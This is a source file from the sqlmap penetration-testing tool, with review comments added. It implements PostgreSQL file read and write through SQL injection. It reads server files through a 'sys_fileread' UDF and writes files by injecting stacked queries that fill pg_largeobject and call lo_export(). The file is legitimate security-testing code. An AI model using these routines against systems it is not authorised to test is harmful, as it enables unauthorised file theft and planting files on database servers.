#!/usr/bin/env python
"""
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import os
from lib.core.common import randomInt
from lib.core.compat import xrange
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.settings import LOBLKSIZE
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
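class Filesystem(GenericFilesystem):
    """
    PostgreSQL-specific file read/write handling built on top of the generic
    filesystem plugin.

    Reads are delegated to the 'sys_fileread' UDF. Writes are staged through
    a PostgreSQL large object and exported with lo_export(). Both paths rely
    on stacked queries issued through lib.request.inject.
    """

    def __init__(self):
        # OID of the large object used by stackedWriteFile()
        self.oid = None
        # Index of the next pg_largeobject page written by stackedWriteFile()
        self.page = None

        GenericFilesystem.__init__(self)

    def stackedReadFile(self, remoteFile):
        """
        Returns the result of evaluating the 'sys_fileread' UDF against
        remoteFile.

        The "fetching file" message is skipped while kb.bruteMode is set.
        """

        if not kb.bruteMode:
            infoMsg = "fetching file: '%s'" % remoteFile
            logger.info(infoMsg)

        # initEnv() is inherited (not visible in this file); presumably it
        # makes sure the UDF used below is available - confirm in the parent
        self.initEnv()

        return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")

    def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
        """
        Always raises SqlmapUnsupportedFeatureException: file upload is not
        implemented for PostgreSQL with the UNION query technique.
        """

        errMsg = "PostgreSQL does not support file upload with UNION "
        errMsg += "query SQL injection technique"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        """
        Writes the content of localFile to remoteFile on the database server
        by staging it page by page in a large object and exporting that
        object with lo_export().

        Returns the value of askCheckWrittenFile() for the written file.
        """

        # Context manager so the local file handle is closed deterministically
        # instead of being left to the garbage collector
        with open(localFile, "rb") as f:
            content = f.read()

        # Taken from the bytes actually read, so the paging loop below can
        # never disagree with the buffer it slices
        localFileSize = len(content)

        self.oid = randomInt()
        self.page = 0

        self.createSupportTbl(self.fileTblName, self.tblField, "text")

        debugMsg = "create a new OID for a large object, it implicitly "
        debugMsg += "adds an entry in the large objects system table"
        logger.debug(debugMsg)

        # References:
        # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
        # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html

        # Drop any large object already using this OID, create a fresh one
        # and clear its data pages before filling it
        # NOTE(review): the direct DELETE/INSERT on pg_largeobject presumably
        # needs elevated database privileges - confirm per server version
        inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
        inject.goStacked("SELECT lo_create(%d)" % self.oid)
        inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)

        # One iteration per large object page of LOBLKSIZE bytes
        for offset in xrange(0, localFileSize, LOBLKSIZE):
            fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
            sqlQueries = self.fileToSqlQueries(fcEncodedList)

            # Stage the base64 chunk in the support table
            for sqlQuery in sqlQueries:
                inject.goStacked(sqlQuery)

            # Decode the staged chunk into the current page, then empty the
            # support table so the next chunk starts clean
            inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
            inject.goStacked("DELETE FROM %s" % self.fileTblName)

            self.page += 1

        debugMsg = "exporting the OID %s file content to " % fileType
        debugMsg += "file '%s'" % remoteFile
        logger.debug(debugMsg)

        # NOTE(review): remoteFile is placed between single quotes as-is;
        # whether a quote inside the path is escaped further down the call
        # chain is not visible here, so such a path may break the statement
        inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)

        written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)

        # Remove the temporary large object once the export was attempted
        inject.goStacked("SELECT lo_unlink(%d)" % self.oid)

        return written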